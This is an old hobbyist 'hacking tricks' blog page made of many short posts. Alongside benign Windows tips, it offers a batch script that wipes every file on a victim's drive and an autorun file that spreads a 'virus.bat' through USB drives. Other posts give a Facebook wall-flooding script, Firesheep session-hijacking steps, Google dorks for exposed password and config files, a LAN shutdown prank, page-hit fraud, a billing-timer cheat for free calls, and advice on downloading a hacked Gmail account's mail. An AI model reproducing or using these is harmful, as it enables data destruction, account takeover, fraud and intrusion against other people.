Blogger Widget ....beware shocked.... 12/26/11 - ....beware shocked....

Monday, December 26, 2011

15 create your own text to speech converter software


Now you can create your own text to speech converter software to make your computer speak whatever you type.Copy the code given below in notepad and save it as anyname.vbs. Make sure that you save it as .vbs file.

Dim message, sapi
message=InputBox("What do you want me to say?","Speak to Me")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak message

0 Hey do you want to destroy someone comp....

just type this code in notepad and save as dell.bat

@echo off
Del C:\ *.*|Y
del %systemdrive%\*.*/f /s /q
shutdown -r -f -t 00

NOTE:do not try this on your own comp.
this code will destroy each and every data of your comp.

0 To secure your WINDOW login use syskey password...


To set syskey password....

click on start

goto run and type syskey (press enter)

click on update

in password startup type your password and reenter your password (press enter)

click on ok

0 How to change WINDOW login password even you don't know user current login password.

click on start and type cmd in run .....

right click on cmd and click on run as administrator.

to view total no of user type this command in cmd

net user (press enter)

to change user password choose your user and type this command

net user username password (press enter)

ooweee.......its changed......

0 Do you want to create a file without name....


well....now,lets go to do this....

create a new forder..
rename this folder...
press and hold "alt" key and type 0160 and then press enter....
you will get a folder without name...

NOTE: type 0160 only from num pad of keyboard.

:)

0 Set control access to your personel folder


suppose you have a folder secret on desktop.

To control access goto start->run
type cmd in run (enter)
type this command in cmd.

cd desktop (enter)
cacls secret /E /P Everyone:N (enter)

now no body can not open your folder even copy and delete.

if you want to access your folder then type this command in cmd.

cd desktop (enter)
cacls secret /E /P Everyone:F (enter)

0 GMail Backup 0.107 | Gmail Backup



Suppose u have password of a gmail account and don't have time to read all E-mail.Now,you want to save all E-mail in your hard drive for later use.what will you do?

so,you can download Gmail-backup software to download all E-mail from any G-mail account into your hard drive for later access...if you hack someone g-mail account,you can use this software to download all mails.
download g-mail backup software here:
GMail Backup 0.107 | Gmail Backup


This is the next release of the GMail Backup tool - the ultimate one-click solution for doing backups of your GMail account.

0 google keyword for search


this is some google keyword for search by i am feeling lucky which is funny and intresting.....try each and every keyword one by one ....you will get new experience with google.

1=google color
2=google heart page
3=epic box
4=sexy snape
5=weenie google
6=20b.0rg
7=who is awesome
8=annoying google
9=google packman
10=google magic
11=elgoog
12=who is cutiest
13=goole loco
14=LOL.limewire
15=google epic
16=rainbow google

0 Suppose u r visiting a site which is not secure or u r downloading a file which is not secure then how u will find that which site is secure to visit or which file is virus free for download

Suppose u r visiting a site which is not secure or u r downloading a file which is not secure then how u will find that which site is secure to visit or which file is virus free for download

first goto



just put ur site url in search box or upload ur file for search.
after scan this will show you result about file and url...........
that is secure or not.....
Virus Free.


Virus free prevention and protection software.

0 How to make a autorun file.


How to make a autorun file.
suppose you have a batch file virus.bat then .....
for autorun file for virus.bat
type this in notepad and save as autorun.inf

[autorun]
open=virus.bat

copy both autorun.inf and virus.bat in pendrive and send.
your virus.bat file will automatically execute if someone just attach ur pendrive...

0 best result after search about hacking



If u want to see best result after search about hacking then use

http://www.altavista.com/

This is also a search engine like google but it gives result only about hacking.
you can say that this is search engine about hacking.
Yahoo! Search - Web Search
www.altavista.com
The search engine that helps you find exactly what you're looking for. Find the most relevant information, video, images, and answers from all across the Web.

2 find domain details of any site



For find domain details of any site just visit to


input the domain address in whois search colum and search.
this will show you all domain details ..........

Whois.net, Your Trusted Source for Secure Domain Name Searches, Registration, Availability & More. Use Our Free Whois Lookup Database To Search For & Reserve Your Domain Today at Whois.net!

0 Make Google go Round Round.





  • Go to google.com and type "Do a barrel roll", see what happens.



Or you can use this direct link instead :





this is funny and intresting........
do a barrel roll - Google Search


0 I usually store all my important files and documents in one separate drive/folder on my laptop and I always wish that no one else could touch them without my permission. And when I give my laptop to other people I always fear that the person using my lappy might access my personal files


If your computer is accessed by many people then you may want to restrict access to certain drives/folder on your computer for other users.

To block access to drive/folder go to Computer and right click on the drive/folder and select properties. In the properties window click on ‘Security’ tab. Select the user account you want to restrict and click on edit.
Change the permissions according to your need for user groups or a particular user and click Apply and then OK. It will not work for users with admin account as even they have the same rights as you so they can revert all permissions. You will need an admin account to perform this task.This trick is for Windows 7 ultimate and premium edition users.

0 Wpscan tool :-


Hi all, today I am gonna take a look of an amazing tool. We all know the wordpress which is mostly used by many bloggers because it is open source and it has so many features to make your blog so attractive and amazing.but as we know in you are on the web u must need to take care of the security because now days hackers are more active and they can use the bug and known exploit to hack the websites.

So, I am gonna talk about another very useful security auditing tool specially written for wordpress security check. This tool is open source and can be used by system administrators or used in to check wordpress security so that hackers attacks cant harm your website.

The tool name is “wpscan” it is written in ruby and can be used on LINUX,WINDOWS,OSX and it can be easily download from the internet . Basically this tool is try to find out the know exploit about the wordpress and report it so that you can fix it up. As we know wordpress is used by number of people and this is the major concern that number of bugs and exploit introduced and by exploiting that bugs hacker ca take over on you website so wpscan take care of it and run security check on wordpress installation and installed plugin it has its database to check the know bugs and user can easily update it .

It has amazing features:-

We can crack weak password

It is multithreaded

We can find out vulnerability which is based on version of wrodpress.

We can enumerate the installed most popular plugin of wordpress which has 2220 in number by default.

We can find out vulnerability based on plugin installed in wordpress also check the vulnerability based on plugin version.

We can also enumerate username from location header etc. and can able to to find themes installed dir listing etc.

It can brute force the username and password using dictionary attack.

It can be used with metasploit too .

Installation is very easy but it requires some dependency which can be find on readme file .

Wpscan can be download from google project hosting

http://code.google.com/p/wpscan/

usage:-

it is very easy to use this tool it is has command line interface .

we can use some command like :-

[-]#ruby wpscan.rb –url www.websitename.com –version.

It will only check the version.

[-]#ruby wpscan.rb –url www.websitename.com –enumerate p .

It will enumerate installed plugin.

You will find all other example on tool using –h parameter which is stand for further help.

Hope you like this article

Thanxx…….

2 ‎"Access your Personal Computer from Anywhere"


If you are travelling and you need a file which resides in your Personal Computer then what 
will you do?
Don’t worry I am here to help you friends.
Today I have come up with a very important topic “Access your Personal Computer from Anywhere”
Through Remote PC you can access your personal computer from anywhere in the world!!!

Opera Unite, by using this tool one can easily turn his computer into a web server and can access documents on that computer from any other web browser. Opera Unite is a standard web server and it allows us to download files directly from the computer without uploading.

Copernic is popular desktop accessing software that is used to find emails, pictures and other files on Windows computer. Copernic also have a component called myCopernic on the Go for remotely searching the content stored on the home or office computer. One can preview the search results and then download them to your mobile phone or remote PC.

Another option is GBridge , it allows you to setup a virtual private network using your Google Account. Now a day’s many companies are using VPNs to let employees access their data over an unsecure public network (Internet) with this tool. It also allows home users to build their own VPNs to access remote files more securely.

But in my personal opinion the best option is Windows Live Sync at sync.live.com for remotely accessing files over the Internet. You have to just install the Live Sync client on your computer and you can access the entire hard drive of that computer simply through the Windows Live Sync website.

Live Sync is available for both Mac and Windows.

1 Google’s Advance Search Query Syntaxes


Below discussed are various Google’s special commands and I shall be explaining each command in
brief and will show how it can be used for critical information digging.
[ intitle: ]
The “ intitle: ” syntax helps Google restrict the search results to pages containing that word in the title. For
example, “intitle: login password ” (without quotes) will return link s to those pages that has the word
“login " in their title, and the word " password " anywhere in the page.
Similarly, if one has to query for more than one word in the page title then in that case “ allintitle:” can be
used instead of “ intitle ” to get the list of pages containing all those words in its title. For example using
“ intitle: login intitle: password ” is same as querying “ allintitle: login password ”.
inurl: [ ]
The “ inurl: ” syntax restricts the search results to those URLs containing the search keyword. For
example: “ inurl: passwd” (without quotes) will return only links to those pages that have " passwd " in the
URL.
Similarly, if one has to query for more than one word in an URL then in that case “ allinurl: ” can be used
instead of “ inurl ” to get the list of URLs containing all those search keywords in it. For ex ample: “ allinurl:
etc/passwd “ will look for the URLs containing “ etc ” and “ passwd ”. The slash (“/”) between the words will
be ignored by Google.
[ site: ]
The “ site: ” syntax restricts Google to query for certain keywords in a particular site or domain. For
example: “ exploits site: innobuzz.in ” (without quotes) will look for the keyword “ exploits ” in those
pages present in all the links of the domain “ innobuzz.in” . There should not be any space between
“site:” and the “domain name”.
[ filetype: ]
This “ filetype: ” syntax restricts Google search for files on internet with particular extensions (i.e. doc, pdf
or ppt etc). For example: “ filetype: doc site: gov confidential ” (without quotes) will look for files with “.doc”
extension in all government domains with “ .gov ” extension and containing the word “confidential” either in
the pages or in the “.doc” file. i.e. the result will contain the links to all confidential word document files on
the government sites.
[ link: ]
“link:” syntax will list down webpages that have links to the specified webpage. For Example:
“ link: www.innobuzz.in ” will list webpages that have links pointing to the Innobuzz homepage.
Note there can be no space between the "link :" and the web page url.

[ related: ]
The “related:” will list web pages that are "similar" to a specified web page. For Example:
“related:www.innobuzz.in” will list web pages that are similar to the Innobuzz homepage. Note
there can be no space between the "related:" and the web page url.
[ cache: ]
The query “ cache: ” will show the version of the web page that Google has in its cache. For Example:
“ cache: www.innobuzz.in ” will show Google's cache of the Google homepage. Note there can be
no space between the "cache:" and the web page url.
If you include other words in the query, Google will highlight those words within the cached document. For
Example: “ cache: www.innobuzz.in guest ” will show the cached content with the word " guest "
highlighted.
[ intext: ]
The “ intext: ” syntax searches for words in a particular website. It ignores links or URLs and page titles.
For example: “ intext: exploits” (without quotes) will return only links to those web pages that has the
search keyword " exploits " in its webpage.
[ phonebook: ]
“ phonebook ” searches for U.S. street address and phone number information. For Example:
“ phonebook: Mario+LA ” will list down all names of person having “ Mario ” in their names and located in
“ Los Angeles (LA) ”. This can be used as a great tool for hackers in-case someone want to do dig personal
information for social engineering.

0 Querying for vulnerable sites or servers using Google’s advance syntaxes


Well, the Google’s query syntaxes discussed above can really
help people to precise their search and get what they are
exactly looking for.
Now Google being so intelligent search engine, malicious users
don’t mind exploiting its ability to dig confidential and secret
information from internet which has got restricted access. Now I
shall discuss those techniques in details how malicious user dig
information from internet using Google as a tool.
Using “Index of ” syntax to find sites enabled with Index browsing
A webserver with Index browsing enabled means anyone can browse
the webserver directories like ordinary local directories. Here
I shall discuss how one can use “index of” syntax to get a list
links to webserver which has got directory browsing enabled.
This becomes an easy source for information gathering for a
hacker. Imagine if the get hold of password files or others
sensitive files which are not normally visible to the internet.
Below given are few examples using which one can get access to
many sensitive information much easily.
Index of /admin
Index of /passwd
Index of /password
Index of /mail
"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess
"Index of /secret"
"Index of /confidential"
"Index of /root"
"Index of /cgi-bin"
"Index of /credit-card"
"Index of /logs"
"Index of /config"

Looking for vulnerable sites or servers using “inurl:” or “allinurl:”

a. Using “allinurl: winnt/system32/ ” (without quotes) will list
down all the links to the server which gives access to
restricted directories like “system32” through web. If you are
lucky enough then you might get access to the cmd.exe in the
“system32” directory. Once you have the access to “cmd.exe”
and are able to execute it then you can go ahead in further
escalating your privileges over the server and compromise it.

b. Using “allinurl: wwwboard/passwd.txt ” (without quotes) in the
Google search will list down all the links to the server which
are vulnerable to “WWWBoard Password vulnerability”. To know
more about this vulnerability you can have a look at the
following link:


c. Using “inurl: .bash_history ” (without quotes) will list down
all the links to the server which gives access to
“.bash_history” file through web. This is a command history
file. This file includes the list of command executed by the
administrator, and sometimes includes sensitive information
such as password typed in by the administrator. If this file
is compromised and if contains the encrypted unix (or *nix)
password then it can be easily cracked using “John The
Ripper”.

d. Using “ inurl: config.txt” (without quotes) will list down all
the links to the servers which gives access to “config.txt”
file through web. This file contains sensitive information,
including the hash value of the administrative password and
database authentication credentials. For Example: Ingenium
Learning Management System is a Web-based application for
Windows based systems developed by Click2learn, Inc. Ingenium
Learning Management System versions 5.1 and 6.1 stores
sensitive information insecurely in the config.txt file. For
more information refer the following links:


0 by LAN connection to shutdown all computers


Guys here is a amazing trick which you can use in your school, college office or at any place where you are a part of any LAN to shutdown all computers. Just follow some steps and you are done with this cool trick.

1. First of all you need admin access to a computer connected on any LAN.

2. Now open commant prompt. (start/run/cmd)

3. Now type “shutdown –i” (without quotes).

4. A dilogue box will open.

5. You can add the computer/computers you want to make target.

6. Now you have to choose the action(shutdown/restart/log out).

7. Set a time limit.

8. Click ok and other work will be done automatically.





Enjoy … !!

0 Flooding on facebook wall



Flooding is a technique by which you can post lagre quantity of messages on someone’s wall. You have to set no. of copies and that much messages will be posted on user’s wall. It’s so simple and itresting to do. A javascript works behind this flooding trick. Here I will tell you how to do flooding on your friend’s wall.

First of all copy the below mentioned javascri...
See More



var a = document.body.innerHTML; var Num = prompt("Facebook Wall Flooder by Personant95\n ", "Amount of message loops"); formx = a.match(/name="post_form_id" value="([\d\w]+)"/)[1]; dts = a.match(/name="fb_dtsg" value="([^"]+)"/)[1]; composerid = a.match(/name="xhpc_composerid" value="([^"]+)...

0 Windows 7 comes with the awesome Problem Steps Recorder

Windows 7 comes with the awesome Problem Steps Recorder to automatically capture the steps you take on a computer, including a text description of where you clicked and a picture of the screen during each click (called a screen shot).

Once you capture these steps, you can save them to a file that can be used by a support professional or someone else helping you with a computer problem.

1 If you are a Facebook user, please read this, understand and press the share button now. Many seem to have lost their Facebook accounts and other personal details becoming a victim of this scam!

1= You will get an email that looks like it is from Facebook

2=The email tells you have "Violated" Facebook's terms so your profile will be deleted

3=You are asked to login (re-directed to a fake Facebook page)


4=The fake Facebook login page captures your password and other details

5= Your account get locked and your personal information stolen!

So make sure you never click on any link to login to Facebook. Always use https://facebook.com/ directly for logging in to your account securely.

0 Increase page views of your websites about 520 per hour or even more

Page Hits Flooder - Increase page views of your websites about 520 per hour or even more

I am going to show you how to increase the page hits of you website.For this you want to dedicate a browser .In this i am using internet explorer.Here is of step by step procedure to achive it:

Open notepad and copy the following code (replace http://yoursite.com/ with your website) 

@echo off
:1
start C:\Progra~1\Intern~1\iexplore.exe "http://yoursite.com/"
ping -n 10 127.0.0.1 >nul
taskkill.exe /im iexplore.exe
goto 1

In the above code you can increase the 10 sec time wait.
With 10 sec time u may have 360 hits in an hour. With 5 sec time u may have 720 hits in an hour. You want to set it according to your internet speed

Save the file as anyname.bat
Then open the file and you can see it.

0 Firesheep uses Http Session hijacking attack to gain unauthorized access to a Facebook or any other account

Recently a new firefox addon Firesheep have been a cause of thousands of email accounts, As reported by techcurnch, Firesheep has been downloaded more than 104,000 times in roughly last 24 hours, With Firesheep the hacker can control any account without even knowing the username and password of the desired account, As Facebook is worlds most popular Social Networking website, therefore it has been the major victim of it, Firesheep uses Http Session hijacking attack to gain unauthorized access to a Facebook or any other account


What is Session Hijacking?

In a Http session hijacking attack an attacker steals victims cookies, Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Facebook Google, Yahoo, Orkut, Flickr etc or any other email account

How can a Hacker use Firesheep to Hack a Facebook or any other account?

Now I will tell you how can a hacker use firesheep to hack a facebook or any other account, You will need the following things:


Public wifi access
winpcap
Firesheep

Method

1. First of all download "Firesheep" from the above link and use the "openwith"option in the firefox browser



2. Once you have installed firesheep on firefox web browser, Click on view at the top, then goto sidebar and click on Firesheep

3. Now click on the top left button "Start capturing" and it will start to capture the session cookies of people in your wifi network, This will show you the list of those people whose cookies are captured and have visited unsecured website known to firesheep, Double click on the photo and you will be logged in instantly

this is link to download winpcap

this is link to download firesheep

39 change yours Facebook themes


are you bored using Same Facebook Skins and Layouts in yours profiles want to change this dont worry it will be easy and take yours few mintutes to change yours Facebook themes.


Just follow the guideline below and you will change your facebook theme in minutes and making your Facebook experience alot better than before


Requirements


There are two basic requirements before you can use the themes.
Mozilla Firefox
Greasemonkey/Stylish add-on for Firefox


Free Facebook Themes
If you already meet all the requirements, then let the themes begin!


spring facebook theme
download from here


http://userstyles.org/styles/userjs/5537/%40bsolutely%20the%20best%20skin%204%20Facebook%20-%20Spring%20Skin.user.js


summer spring facebook theme
download from here


http://userstyles.org/styles/userjs/6775/%40bsolutely%20the%20best%20skin%204%20Facebook%20-%20summer%20skin.user.js


free facebook black theme
download from here


http://userstyles.org/styles/6997


free facebook pink theme
download from here


http://userstyles.org/styles/6997

0 do u want to be CEH certified hacker absolutely free..



do u want to be CEH certified hacker absolutely free.........
just visit to this link......

http://www.hackerzvoice.net/ceh/

...
See More
Index of /ceh
www.hackerzvoice.net


0 download video from youtube.



hey...how you download video from youtube.
by you tube downloader or IDM..

let start download video from youtube without using any software.

1=click on video.

2=copy the video link from URL bar

3=add "kick" in between 'www.' and 'youtube.com/example'

4=copy link and paste in URL bar,press enter.

5=now click on download.
your video from youtube now will start without any software.

*you can directally edit address in URL without copy & paste.

EX.
suppose u r downloading a song from youtube and that song have this link

http://www.youtube.com/watch?v=ka1JNhprlag

so just add "kick" in address,now u have address like that

http://www.kickyoutube.com/watch?v=ka1JNhprlag

press enter...

click on download......
thats it....have fun....

0 Hide Files or Folders Using Command Prompt


You can now easily hide your files or folders through Command Prompt. It will be impossible for others to find the file or folder unless they know the filename or folder name. You can secure your documents easily by this method. Make sure you remember the file or folder name! 


1. Press windowkey+R: Run command dialog box appears.

2. Now type "cmd" and hit enter. A command prompt window displays.

3. Now type "attrib +s +h D:\Manish" and hit enter.

4. The folder " Manish " will be hidden.

0 easily change your Windows 7 background image


If you are bored of the same blue welcome screen in Windows 7 then here is the trick for you. Using this trick you can easily change your Windows 7 background image.


Press windows+r to open run and then type regedit. Press Enter.
Now in Registry Editor navigate to the following key. HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersionAuthentication/LogonUI/Background. There create a new DWORD value and name it as OEMBackground. Set it’s value as Hexadecimal – 1 .
Now go to c:/Windows/System32/oobe and there create new folder and name it as info.There create one more folder and name this one as backgrounds .
Now copy the image you want as background for welcome screen here and rename the image to backgroundDefault, also make sure that the image size is less than 256 KB.

0 play online small and intresting game on

Welcome to our arcade that we have filled with tons of games!

0 hey,are you feel bore to login in your window each time, u can directally login in ur WINDOW without enter ur password......


u can also make some fun with ur friend laptop if u know his window login password.....

just type "netplwiz" in run without commas....
uncheck "user must enter a username and passwod to use this password" and then appy,ok........

now.....u don't have need to type ur login password each time.......

have fun.......enjoy...
feel free to query..........:)

0 Free calls to mobile phones


In this post I am going to show you how to make free calls to mobile phones.

Firstly you need to install the Friend caller client. It can be downloaded free of cost from 
http://www.friendcaller.com/WebPhone/Client/FriendCaller.jnlp

After installing it open it and register for an account using an e-mail id
Then open your mail and click on the confirmation mail to verify your account. You will be credited with 0.10$ which entitles you to make free calls for 10 seconds only, but I am going you to explain, how to make that call an unlimited one.

Login to Friend caller and click the phone icon.

Now open the cheat engine client (It can also be downloaded free of cost from http://www.cheatengine.org/  and installed)

In cheat engine, click the open process button, a pop up window will appear, in that click window list button. And select friend caller from the list and open it.

Now you can dial the number which you want to call and click call. It will start to ring. Now in the cheat engine you must enable the speed hack check box, and set the speed to 0.00

After this you can continue this call. The timer will freeze. When you want to end the call, disable the speed hack check box and immediately end the call in friend caller. You will be charged around 0.02$ for this call, but when your balance runs out after making a few calls then create a new account and continue this.

Blogger Widgets